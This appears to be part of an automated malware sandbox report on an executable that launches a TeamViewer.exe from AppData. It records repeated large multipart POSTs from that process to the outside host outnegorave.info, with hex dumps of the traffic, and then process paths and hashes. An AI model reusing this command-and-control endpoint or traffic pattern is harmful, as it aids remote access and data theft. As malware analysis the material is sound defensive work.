2021-09-15 11:52:46 UTC | 3040 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 33 32 33 39 36 37 33 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
Data Ascii: ----------1323967378Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
2021-09-15 11:52:46 UTC | 3123 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 33 32 33 39 36 37 33 37 38 2d 2d 0d 0a 0d 0a
Data Ascii: ----------1323967378--
2021-09-15 11:52:47 UTC | 3123 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:52:47 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 48
Connection: close
x-powered-by: PHP/5.6.40
set-cookie: X-Csrf-Token=5994ed236f8bfb5588079add9ffef02a512ab1e912aa3b636483e00cf9edaf28; expires=Thu, 15-Sep-2022 11:52:47 GMT; Max-Age=31536000; httponly
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GjmFpksB51zXzKjbkdrQszS9unt0Uydas78r8focaGeOR6vg%2BJJgL5lq2tP9YteUN0Qk2D0HUgyWjmVMnzZQItuW4D2v7nCvXqYMnbOTyFld%2Bam1EBAoLCLFijGmo5ZfwfKF"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68f1a69ceaab5c62-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:52:47 UTC | 3124 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
37 | 192.168.2.5 | 49829 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:48 UTC | 3124 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 84983
Content-Type: multipart/form-data; boundary=--------29895310
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: outnegorave.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:52:48 UTC | 3124 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 39 38 39 35 33 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
Data Ascii: ----------29895310Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
2021-09-15 11:52:48 UTC | 3207 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 39 38 39 35 33 31 30 2d 2d 0d 0a 0d 0a
Data Ascii: ----------29895310--
2021-09-15 11:52:52 UTC | 3207 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:52:52 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 48
Connection: close
x-powered-by: PHP/5.6.40
set-cookie: X-Csrf-Token=602ee26cb44b087d943dc459fb822989eb5923319ace30dac624cd1068b23fe3; expires=Thu, 15-Sep-2022 11:52:48 GMT; Max-Age=31536000; httponly
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Mhh6w43hRAIQJ5I1F4UM2b0uq2tn2hIYKI1rYXGkRO6rHJhGC06kq2CvVen07%2Bp4tzGylQqui5%2Fjz2YLTY9yK5ZM2ecPRCo4MrPZfoM0U75fe5bU1TWY02ydEMfGQTfPnqdf"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68f1a6a61d0a2c19-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:52:52 UTC | 3208 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    38192.168.2.549833172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:52 UTC3208OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84996
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------4240026889
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:52:52 UTC | 3208 | OUT | Data (ASCII):
----------4240026889
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:53:15 UTC | 3291 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:53:15 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=5bdedd4b6ed9090b9a1ac0068609d698fe8eafb41b220c31c3d72c7e542623c9; expires=Thu, 15-Sep-2022 11:52:54 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2dvj%2B7Xb741Sr5e3Hksj2uvKmpAvI3oY0efw%2B241oILYuIvNE0%2FjegEHaphsU9pqEhVEpttKALtjejZnjPu6kAymQc%2FIQy5qFUWz45FW7anFRXlTILJlO7lR%2FmF1sHXerZJ1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a6c1edd84ee5-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49761 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:02 UTC | 342 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84980
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------4273960975
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:52:02 UTC | 342 | OUT | Data (ASCII):
----------4273960975
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:52:03 UTC | 425 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:03 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=23ba21015cb0d0d1794a58df9fd074408ab87009869b5e65513202a391036b35; expires=Thu, 15-Sep-2022 11:52:02 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XpV4DbjPIAOwEPkfOdFjfkKlyuxYvbB3gFh4iiozYqjt30Na97RaG5RUXEI6CxfhJsthLnw4x%2Bb9mEosgmTmjM86Z14w7PBLIXGaKN01r8TfLupU23eryVxvK4lc%2FF0uMEZJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5883d0a68ec-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.5 | 49762 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:04 UTC | 426 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84976
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1234881971
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:52:04 UTC | 426 | OUT | Data (ASCII):
----------1234881971
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
                                                                                                                                    Data Ascii: PJQHi)i(pm-RJZ`-QA"E(8RE(ZZJZd-%(E-)i)iE HR(@!))hiB(HZANSTbw=i)QLLZ(bIE0ci#J))iLSRRKIK@KMP&E%-Z(J(@G!'tzd6PQERR
                                                                                                                                    2021-09-15 11:52:04 UTC491OUTData Raw: 40 68 aa 44 8b 4b 49 46 69 85 85 cd 19 a4 14 b4 5c 56 14 52 e6 99 4b 9a 77 0b 0f cd 2d 33 34 b9 a6 4d 87 0a 5c d3 73 45 3b 85 87 e6 8c d3 73 46 ef 6a 2e 2b 12 03 4b 9a 8f 71 f5 a3 3e f4 ee 2b 12 64 51 9a 8f 34 b9 a2 e2 b0 fc d1 9a 6e 68 cd 3b 85 87 52 e6 9b 46 68 b8 ac 3b 34 b9 a6 66 8c d3 b8 58 7e 68 cd 33 75 26 ea 2e 1c a4 99 a3 35 1e ea 37 52 b8 72 92 6e a4 dd 51 17 a6 97 a1 c8 6a 04 c5 a9 a5 ea 22 f4 d2 d5 2e 65 28 12 97 a6 17 a8 cb 53 0b 54 39 16 a0 48 5f de 98 5a 98 5a 98 5a a1 c8 d1 44 79 6a 61 6a 69 6a 61 6a cd c8 d1 44 71 34 c2 69 09 a4 a8 6c b4 85 26 92 92 8c d2 63 b0 86 8a 0d 36 a4 a4 19 a2 92 92 95 c7 62 86 3b d2 d2 51 5c a7 58 b4 51 46 28 00 a2 8a 28 10 b4 51 49 40 05 14 51 40 05 2d 25 2d 00 14 51 45 02 0a 28 a2 98 05 14 51 40 05 2d 14 50 01
                                                                                                                                    Data Ascii: @hDKIFi\VRKw-34M\sE;sFj.+Kq>+dQ4nh;RFh;4fX~h3u&.57RrnQj".e(ST9H_ZZZDyjajijajDq4il&c6b;Q\XQF((QI@Q@-%-QE(Q@-P
                                                                                                                                    2021-09-15 11:52:04 UTC507OUTData Raw: b0 dd 36 94 c6 fa 01 ce c0 31 2a 8f a7 f1 7e 1c fb 57 41 e1 1f 03 68 66 d6 3b eb 99 7f b4 64 3d 51 97 6a 46 dd d4 a7 5c 8e e1 bf 2a 40 79 5c d1 49 04 ad 14 f1 bc 72 21 c3 23 a9 04 1f 70 69 95 d1 fc 42 44 8f c6 b7 e9 1a aa 22 88 80 55 18 00 79 49 5c e5 50 82 ad e9 b6 4d 7d 74 23 07 6a 0e 5d bd 05 54 ae 83 c2 fb 71 72 0f 5f 97 f2 e6 a6 4e cb 42 2a 54 54 d7 3b 57 b1 b9 67 a3 5b 84 d9 6d 66 24 da 39 25 37 1f c6 ab ea 1e 1c 17 0a c2 3b 56 86 61 d0 aa 11 f9 8a dd 1b ff 00 b3 6d c4 59 31 8c ef c7 f7 f3 df f0 c5 6d e9 be 6f d8 53 cf ce ec 9d bb ba ed ed fd 6b 0c 4d 29 50 c3 ac 42 96 bd 8f 46 18 ea 75 a7 ec a3 0f 74 f1 69 a2 78 26 78 a5 52 ae 84 ab 03 d8 d3 2b 6b c6 3e 5f fc 25 17 be 56 31 b9 73 8f 5d a3 3f ad 62 d6 d4 e5 cf 05 2e e8 e2 92 b3 68 28 a2 96 ac 41 49
                                                                                                                                    Data Ascii: 61*~WAhf;d=QjF\*@y\Ir!#piBD"UyI\PM}t#j]Tqr_NB*TT;Wg[mf$9%7;VamY1moSkM)PBFutix&xR+k>_%V1s]?b.h(AI
2021-09-15 11:52:04 UTC | 509 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 33 34 38 38 31 39 37 31 2d 2d 0d 0a 0d 0a
Data Ascii: ----------1234881971--
2021-09-15 11:52:04 UTC | 509 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:04 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=8490ae67c582642b596f68028a5e386c5d93dc82432e967e5164766534f9ddc7; expires=Thu, 15-Sep-2022 11:52:04 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FHRfFjvvsvkqAxO29INwRQNNahZ%2F0vOp%2FD1TV0FBJR%2FMZWD7zFUOgkNs9cQRI2tfbyZ1HFlzxRCEiQdjTYB9wDYZYdhdThckiLtxcOLOrVM%2FF6xanGrX9ViyVqHy8vtWMxhf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a59149631f39-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:52:04 UTC | 510 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.5 | 49763 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:05 UTC | 510 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84926
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------3962184161
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:52:05 UTC | 511 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 39 36 32 31 38 34 31 36 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
Data Ascii: ----------3962184161
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:52:05 UTC | 593 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 39 36 32 31 38 34 31 36 31 2d 2d 0d 0a 0d 0a
Data Ascii: ----------3962184161--
2021-09-15 11:52:05 UTC | 594 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:05 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=3e32c448e2565fe072e94ce275d9daffacb854e72f233573e0ca0096e875c7bd; expires=Thu, 15-Sep-2022 11:52:05 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=32C36IPAAHhsGohK2WeeQppPTfijY2hIFBdq6i6vHLGDXJ3KT3c0FUc1GPAW7VmZtMwENC%2Fb63OVEwTzQSrO5dJ1UY7ZGetXSyAzwbXe%2FEnZKIrei6GM6tDWWMcft%2BGX3rGR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5993cd6699f-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:52:05 UTC | 594 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.5 | 49764 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:06 UTC | 594 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84962
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1422274513
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:52:06 UTC | 595 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 34 32 32 32 37 34 35 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
Data Ascii: ----------1422274513
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:06 UTC678OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 34 32 32 32 37 34 35 31 33 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1422274513--
2021-09-15 11:52:06 UTC | 678 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:06 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=4c3a5526c817afa646186a01761d251df18ffe651d1b26458685ed6875a83c4d; expires=Thu, 15-Sep-2022 11:52:06 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IZXopL8eItBBq2J6qFZiRQimk%2FSbTvM6MRwQqmZ5at8gfPSa2Zs7Xb22d6NyedPwnOMRbTHH36CEYSe0hfGPGi5QVuw9Co3RyMumucSB%2Fx%2Bn3H0miSF8CBVtfQZExOIrDBay"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5a098d44e7a-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:52:06 UTC | 679 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.5 | 49767 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:07 UTC | 679 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 85001
Content-Type: multipart/form-data; boundary=--------1112577220
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: outnegorave.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:52:08 UTC | 762 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:08 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=e5f1721d771ebb63b828c57eaf3aa838382a6112d35f7fdeb0e8b473433b80ca; expires=Thu, 15-Sep-2022 11:52:07 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Uz4kOaDXyL7s%2Bq5p5LXzdEhmXf5nBILqaQKKygUP%2BVKInrV85Shc6KgQDKj%2BUzD2hwR2PVEA6odDTZwM86UeF%2F%2BrUoMvHDnl1GqniaTIAEht%2FlUd8kju8EsoB6sCelM98cAm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5a62eb1691b-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:52:08 UTC | 763 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.5 | 49770 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:08 UTC | 763 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 85017
Content-Type: multipart/form-data; boundary=--------3839284298
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: outnegorave.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:52:09 UTC | 846 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:09 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=ef5d3d7a7aee2c9a7fa6c79d2bb1535bff75bb04da22ac1e3f3e7e214a19aef6; expires=Thu, 15-Sep-2022 11:52:08 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Nfbncy1fCaWjTonuebiX85LFAnnCpgFc7OZQGsK45jyzTmubq%2BWcpf9cNjzQTipzA3WpR6kFIUGSEhqsH5knh9M2AQEgcTKS82b1XHjvGNvLkCIO6Wy3mSVmkB3MklzBGFll"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5aebb734a6d-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:52:09 UTC | 847 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Code Manipulations

                                                                                                                                    Statistics

                                                                                                                                    Behavior

                                                                                                                                    System Behavior

                                                                                                                                    General

                                                                                                                                    Start time:13:51:03
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:'C:\Users\user\Desktop\77Etc0bR2v.exe'
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:1828192 bytes
                                                                                                                                    MD5 hash:E71E3B995477081569ED357E4D403666
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low

                                                                                                                                    General

                                                                                                                                    Start time:13:51:06
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:4375848 bytes
                                                                                                                                    MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 0%, Metadefender
                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                    Reputation:low

                                                                                                                                    General

                                                                                                                                    Start time:13:51:11
